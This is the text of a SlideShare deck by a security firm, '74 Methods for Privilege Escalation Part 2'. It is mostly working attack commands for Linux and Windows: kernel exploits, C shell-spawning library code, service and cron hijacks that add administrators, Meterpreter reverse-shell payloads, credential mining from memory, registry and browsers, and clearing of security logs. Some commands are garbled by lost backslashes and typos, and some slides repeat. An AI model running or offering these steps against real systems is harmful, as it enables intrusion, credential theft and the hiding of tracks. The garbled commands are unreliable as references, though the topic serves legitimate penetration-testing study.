SlideShare a Scribd company logo

74 Methods for Privilege Escalation Part 2

Hadess
Hadess

74 Methods for Privilege Escalation - Part 2 The part two of Privilege escalation methods with complete Distributions: 1. DirtyC0w 2. CVE-2016-1531 3. Polkit 4. DirtyPipe 5. PwnKit 6. ms14_058 7. Hot Potato 8. Intel SYSRET 9. Abusing journalctl 10. PrintNightmare 11.Folina 12. ALPC 13. RemotePotato0 14. CVE-2022-26923 15. MS14-068 16. Sudo LD_PRELOAD 17. Abusing File Permission via SUID Binaries - .so injection) 18. DLL Injection 19. Early Bird Injection 20. Process Injection through Memory Section 21. Abusing Scheduled Tasks via Cron Path Overwrite 22. Abusing Scheduled Tasks via Cron Wildcards 23. Abusing File Permission via SUID Binaries - Symlink) 24. Abusing File Permission via SUID Binaries - Environment Variables #1) 25. Abusing File Permission via SUID Binaries - Environment Variables #2) 26. DLL Hijacking 27. Abusing Services via binPath 28. Abusing Services via Unquoted Path 29. Abusing Services via Registry 30. Abusing Services via Executable File 31. Abusing Services via Autorun 32. Abusing Services via AlwaysInstallElevated 33. Abusing Services via SeCreateToken 34. Abusing Services via SeDebug 35. Remote Process via Syscalls (HellsGate|HalosGate) 36. Escalate With DuplicateTokenEx 37. Abusing Services via SeIncreaseBasePriority 38. Abusing Services via SeManageVolume 39. Abusing Services via SeRelabel 40. Abusing Services via SeRestore 41. Abuse via SeBackup 42. Abusing via SeCreatePagefile 43. Abusing via SeSystemEnvironment 44. Abusing via SeTakeOwnership 45. Abusing via SeTcb 46. Abusing via SeTrustedCredManAccess 47. Abusing tokens via SeAssignPrimaryToken 48. Abusing via SeCreatePagefile 49. Certificate Abuse 50. Password Mining in Memory 51. Password Mining in Memory 52. Password Mining in Registry 53. Password Mining in General Events via SeAudit 54. Password Mining in Security Events via SeSecurity 55. Startup Applications 56. Password Mining in McAfeeSitelistFiles 57. Password Mining in CachedGPPPassword 58. Password Mining in DomainGPPPassword 59. Password Mining in KeePass 60. Password Mining in WindowsVault 61. Password Mining in SecPackageCreds 62. Password Mining in PuttyHostKeys 63. Password Mining in RDCManFiles 64. Password Mining in RDPSavedConnections 65. Password Mining in MasterKeys 66. Password Mining in Browsers 67. Password Mining in Files 68. Password Mining in LDAP 69. Password Mining in Clipboard 70. Password Mining in GMSA Password 71. Delegate tokens via RDP 72. Delegate tokens via FTP 73. Fake Logon Screen 74. Abusing WinRM Services

Technology
1 of 81
Download to read offline
74 METHODS FOR PRIVILEGE ESCALATION PART 2 HADESS | SECURE AGILE DEVELOPMENT WWW.HADESS.IO
NO Y/N Yes NO NO NO Y/N Y/N N N N YES YES YES Y/N YES YES YES NO NO Y/N NO Y/N YES No PART 1 SUMMARY HADESS | SECURE AGILE DEVELOPMENT Method DOMAIN APT 1 Abusing Sudo Binaries 2 Abusing Scheduled Tasks 3 Golden Ticket With Scheduled Tasks 4 Abusing Interpreter Capabilities 5 Abusing Binary Capabilities 6 Abusing ActiveSessions Capabilities 7 Escalate with TRUSTWORTHY in SQL Server 8 Abusing Mysql run as root No Method DOMAIN APT 9 Abusing journalctl 10 Abusing VDS 11 Abusing Browser 12 Abusing LDAP 13 LLMNR Poisoning 14 Abusing Certificate Services 15 MySQL UDF Code Injection 16 Impersonation Token with ImpersonateLoggedOnuser No Method DOMAIN APT 17 Impersonation Token with SeImpersontePrivilege 18 Impersonation Token with SeLoadDriverPrivilege 19 OpenVPN Credentials 20 Bash History 21 Package Capture 22 NFS Root Squashing 23 Abusing Access Control List 24 Escalate With SeBackupPrivilege
No PART 1 SUMMARY HADESS | SECURE AGILE DEVELOPMENT Method DOMAIN APT 25 Escalate With SeImpersonatePrivilege YES 26 Escalate With SeLoadDriverPrivilege YES 27 Escalate With ForceChangePassword YES 28 Escalate With GenericWrite YES 29 Abusing GPO YES 30 Pass-the-Ticket YES 31 Golden Ticket YES 32 Abusing Splunk Universal Forwarder NO No Method DOMAIN APT 33 Abusing Gdbus Y/N 34 Abusing Trusted DC YES 35 NTLM Relay YES 36 Exchange Relay YES 37 Dumping with diskshadow YES 38 Dumping with vssadmin YES 39 Password Spraying Y/N 40 AS-REP Roasting YES
PART 2
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit gcc -pthread c0w.c -o c0w; ./c0w; passwd; id DIRTYC0W HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit CVE-2016-1531.sh;id CVE-2016-1531 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege- Esclation poc.sh POLKIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit ./traitor-amd64 --exploit kernel:CVE-2022-0847 Whoami;id DIRTYPIPE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit ./cve-2021-4034 Whoami;id PWNKIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit msf > use exploit/windows/local/ms14_058_track_popup_menu msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id > msf exploit(ms14_058_track_popup_menu) > exploit MS14_058 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit In command prompt type: powershell.exe -nop -ep bypass In Power Shell prompt type: Import-Module C:UsersUserDesktopToolsTaterTater.ps1 In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add" To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators HOT POTATO HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit execute -H -f sysret.exe -a "-pid [pid]” INTEL SYSRET HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/outflanknl/PrintNightmare PrintNightmare 10.10.10.10 exp.dll PRINTNIGHTMARE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/JohnHammond/msdt-follina python3 follina.py -c "notepad" FOLINA HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/riparino/Task_Scheduler_ALPC ALPC HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user .RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1 REMOTEPOTATO0 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show CVE-2022-26923 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841- 771695929-1514560438-1103 -d dc-a-2003.dom-a.loc MS14-068 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Enumeration & Hunt ps -ef | grep ftp; gdp -p ftp_id info proc mappings q dump memory /tmp/mem [start] [end] q strings /tmp/mem | grep passw PASSWORD MINING IN MEMORY(LINUX) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic In Metasploit (msf > prompt) type: set uripath x In Metasploit (msf > prompt) type: run In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic" Select the Copy the Base64 encoded string. In command prompt type: echo -ne [Base64 String] | base64 -d 1 2. 3. PASSWORD MINING IN MEMORY(WINDOWS) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Open command and type: reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v DefaultUsername In command prompt type: reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v DefaultPassword Notice the credentials, from the output. In command prompt type: reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42 -v ProxyUsername In command prompt type: reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42 -v ProxyPassword In command prompt type: reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v Password In command prompt type: reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v PasswordViewOnly Make note of the encrypted passwords and type: C:UsersUserDesktopToolsvncpwdvncpwd.exe [Encrypted Password] From the output, make note of the credentials. 1. 2. 3. 4. 5. 6. Notice the credentials, from the output. 7. 8. 9. 10. PASSWORD MINING IN REGISTRY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 invoke-module LogCleaner.ps1 Or PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 wevtutil cl Security Or PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt In Metasploit (msf > prompt) type: use multi/handler In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address] In Metasploit (msf > prompt) type: run Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe Place x.exe in “C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup”. 1. 2. STARTUP APPLICATIONS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe McAfeeSitelistFiles PASSWORD MINING IN MCAFEESITELISTFILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe CachedGPPPassword PASSWORD MINING IN CACHEDGPPPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe DomainGPPPassword PASSWORD MINING IN DOMAINGPPPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe keepass KeeTheft.exe Or PASSWORD MINING IN KEEPASS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe WindowsVault PASSWORD MINING IN WINDOWSVAULT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe SecPackageCreds PASSWORD MINING IN SECPACKAGECREDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe PuttyHostKeys PASSWORD MINING IN PUTTYHOSTKEYS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe RDCManFiles PASSWORD MINING IN RDCMANFILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe RDPSavedConnections PASSWORD MINING IN RDPSAVEDCONNECTIONS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpDPAPI masterkeys PASSWORD MINING IN MASTERKEYS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpWeb.exe all PASSWORD MINING IN BROWSERS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SauronEye.exe -d C:UsersvincentDesktop --filetypes .txt .doc .docx .xls --contents --keywords password pass* -v` PASSWORD MINING IN FILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))" "samaccountname" Import-Module .PowerView.ps1 Get-DomainComputer COMPUTER -Properties ms-mcs- AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime Or PASSWORD MINING IN LDAP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt execute-assembly /root/SharpClipHistory.exe PASSWORD MINING IN CLIPBOARD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Delegate tokens GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT PASSWORD MINING IN GMSA PASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Delegate tokens ./fake_rdp.py pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem Or DELEGATE TOKENS VIA RDP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Delegate tokens FakeFtpServer fakeFtpServer = new FakeFtpServer(); fakeFtpServer.addUserAccount(new UserAccount("user", "password", "c:data")); FileSystem fileSystem = new WindowsFakeFileSystem(); fileSystem.add(new DirectoryEntry("c:data")); fileSystem.add(new FileEntry("c:datafile1.txt", "abcdef 1234567890")); fileSystem.add(new FileEntry("c:datarun.exe")); fakeFtpServer.setFileSystem(fileSystem); fakeFtpServer.start(); DELEGATE TOKENS VIA FTP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Phish execute-assembly fakelogonscreen.exe FAKE LOGON SCREEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Service RogueWinRM.exe -p C:windowssystem32cmd.exe ABUSING WINRM SERVICES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Certificate ceritify.exe request /ca:dc.domain.localDC-CA /template:User… Rubeus.exe asktgy /user:CORPitadmin /certificate:C:cert.pfx /password:password CERTIFICATE ABUSE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Injection gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles sudo LD_RELOAD=tmp/ldreload.so apache2 id 1. #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } 2. 3. 4. SUDO LD_PRELOAD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Injection Mkdir /home/user/.config gcc -shared -o /home/user/.config/libcalc.so - fPIC/home/user/.config/libcalc.c /usr/local/bin/suid-so id 1. 2. #include <stdio.h> #include <stdlib.h> static void inject() _attribute _((constructor)); void inject() { system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } 3. 4. 5. ABUSING FILE PERMISSION VIA SUID BINARIES - (.SO INJECTION) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Injection 1. RemoteDLLInjector64 Or MemJect Or https://github.com/tomcarver16/BOF-DLL-Inject 2. #define PROCESS_NAME "csgo.exe" Or RemoteDLLInjector64.exe pid C:runforpriv.dll Or mandllinjection ./runforpriv.dll pid DLL INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Injection hollow svchost.exe pop.bin EARLY BIRD INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Injection sec-shinject PID /path/to/bin PROCESS INJECTION THROUGH MEMORY SECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh; chmod +x systemupdate.sh Wait a while /tmp/bash -p id && whoami ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh; touch /home/user/ --checkpoint=1; touch /home/user/ --checkpoint-action=exec=shsystemupdate.sh Wait a while /tmp/bash -p id && whoami ABUSING SCHEDULED TASKS VIA CRON WILDCARDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission su - www-data; nginxed-root.sh /var/log/nginx/error.log; In root user invoke-rc.d nginx rotate >/dev/null 2>&1 1. 2. 3. ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission su - www-data; nginxed-root.sh /var/log/nginx/error.log; In root user invoke-rc.d nginx rotate >/dev/null 2>&1 1. 2. 3. ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission 1. echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >/tmp/service.c; 2. gcc /tmp/services.c -o /tmp/service; 3. export PATH=/tmp:$PATH; 4. /usr/local/bin/sudi-env; id ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #1) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p' ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #2) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege Windows_dll.c: cmd.exe /k net localgroup administrators user /add x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll sc stop dllsvc & sc start dllsvc 1. 2. 3. DLL HIJACKING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege sc config daclsvc binpath= "net localgroup administrators user /add" sc start daclsvc 1. 2. ABUSING SERVICES VIA BINPATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe Place common.exe in ‘C:Program FilesUnquoted Path Service’. sc start unquotedsvc 1. 2. 3. ABUSING SERVICES VIA UNQUOTED PATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege reg add HKLMSYSTEMCurrentControlSetservicesregsvc /v ImagePath /t REG_EXPAND_SZ /d c:tempx.exe /f sc start regsvc 1. 2. ABUSING SERVICES VIA REGISTRY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege copy /y c:Tempx.exe "c:Program FilesFile Permissions Servicefilepermservice.exe" sc start filepermsvc 1. 2. ABUSING SERVICES VIA EXECUTABLE FILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege 1. In Metasploit (msf > prompt) type: use multi/handler In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address] In Metasploit (msf > prompt) type: run Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe 2. Place program.exe in ‘C:Program FilesAutorun Program’. ABUSING SERVICES VIA AUTORUN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege 1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi 2. msiexec /quiet /qn /i C:Tempsetup.msi Or SharpUp.exe AlwaysInstallElevated ABUSING SERVICES VIA ALWAYSINSTALLELEVATED HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. .load C:devPrivEditorx64ReleasePrivEditor.dll 2. !rmpriv ABUSING SERVICES VIA SECREATETOKEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. Conjure-LSASS Or syscall_enable_priv 20 ABUSING SERVICES VIA SEDEBUG HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege injectEtwBypass pid REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege PrimaryTokenTheft.exe pid TokenPlaye.exe --impersonate --pid pid Or ESCALATE WITH DUPLICATETOKENEX HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege start /realtime SomeCpuIntensiveApp.exe ABUSING SERVICES VIA SEINCREASEBASEPRIORITY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege Just only compile and run SeManageVolumeAbuse ABUSING SERVICES VIA SEMANAGEVOLUME HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege WRITE_OWNER access to a resource, including files and folders. Run for privilege escalation 1. 2. ABUSING SERVICES VIA SERELABEL HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with Enable-SeRestorePrivilege). 3. Rename utilman.exe to utilman.old 4. Rename cmd.exe to utilman.exe 5. Lock the console and press Win+U ABUSING SERVICES VIA SERESTORE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic In Metasploit (msf > prompt) type: set uripath x In Metasploit (msf > prompt) type: run 2. In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu. 3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic" Select the Copy the Base64 encoded string. In command prompt type: echo -ne [Base64 String] | base64 -d ABUSE VIA SEBACKUP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin ABUSING VIA SECREATEPAGEFILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege .load C:devPrivEditorx64ReleasePrivEditor.dll TrustExec.exe -m exec -c "whoami /priv" -f 1. 2. ABUSING VIA SESYSTEMENVIRONMENT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. takeown.exe /f "%windir%system32" 2. icalcs.exe "%windir%system32" /grant "%username%":F 3. Rename cmd.exe to utilman.exe 4. Lock the console and press Win+U ABUSING VIA SETAKEOWNERSHIP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege PSBits PrivFu psexec.exe -i -s -d cmd.exe 1. Or 2. ABUSING VIA SETCB HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege .load C:devPrivEditorx64ReleasePrivEditor.dll CredManBOF TrustExec.exe -m exec -c "whoami /priv" -f 1. Or 2. ABUSING VIA SETRUSTEDCREDMANACCESS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege JuicyPotato.exe Or https://github.com/decoder-it/juicy_2 https://github.com/antonioCoco/RoguePotato ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 invoke-module LogCleaner.ps1 1. 2. Or ABUSING VIA SECREATEPAGEFILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
HADESS | SECURE AGILE DEVELOPMENT About Hadess Savior of your Business to combat cyber threats Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats. Contact Us To request additional information about Hadess’s services, please fill out the form below. A Hadess representative will contact you shortly. Email: Marketing@hadess.io Phone No. +989362181112 Company No. +982128427515 +982177873383 Website: www.hadess.io hadess_security
HADESS | SECURE AGILE DEVELOPMENT Hadess Products and Services Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Penetration Testing | PROTECTION PRO Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Red Teaming Operation | PROTECTION PRO Identifying and helping to address hidden weaknesses in your organization’s security. RASP | Protect Applications and APIs Anywhere Identifying and helping to address hidden weaknesses in your Applications. SAST | Audit Your Products Identifying and helping to address hidden weaknesses in your organization’s security PWN Z1 | Audit Your PPP
HADESS Secure Agile Development

Recommended

Dev112 let's calendar that
Dev112 let's calendar thatDev112 let's calendar that
Dev112 let's calendar that
Howard Greenberg
 
Multi threading model
Multi threading modelMulti threading model
Multi threading model
annalakshmir2
 
Tomcat Server
Tomcat ServerTomcat Server
Tomcat Server
Anirban Majumdar
 
Where is my MQ message on z/OS?
Where is my MQ message on z/OS?Where is my MQ message on z/OS?
Where is my MQ message on z/OS?
Matt Leming
 
Domino Tech School - Upgrading to Notes/Domino V10: Best Practices
Domino Tech School - Upgrading to Notes/Domino V10: Best PracticesDomino Tech School - Upgrading to Notes/Domino V10: Best Practices
Domino Tech School - Upgrading to Notes/Domino V10: Best Practices
Christoph Adler
 
Fixing Domino Server Sickness
Fixing Domino Server SicknessFixing Domino Server Sickness
Fixing Domino Server Sickness
Gabriella Davis
 
Deep Dive AdminP Process - Admin and Infrastructure Track at UKLUG 2012
Deep Dive AdminP Process - Admin and Infrastructure Track at UKLUG 2012Deep Dive AdminP Process - Admin and Infrastructure Track at UKLUG 2012
Deep Dive AdminP Process - Admin and Infrastructure Track at UKLUG 2012
BCC - Solutions for IBM Collaboration Software
 
IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2
IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2
IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2
jayeshpar2006
 

Recommended

Dev112 let's calendar that
Dev112 let's calendar thatDev112 let's calendar that
Dev112 let's calendar that
Howard Greenberg
 
Multi threading model
Multi threading modelMulti threading model
Multi threading model
annalakshmir2
 
Tomcat Server
Tomcat ServerTomcat Server
Tomcat Server
Anirban Majumdar
 
Where is my MQ message on z/OS?
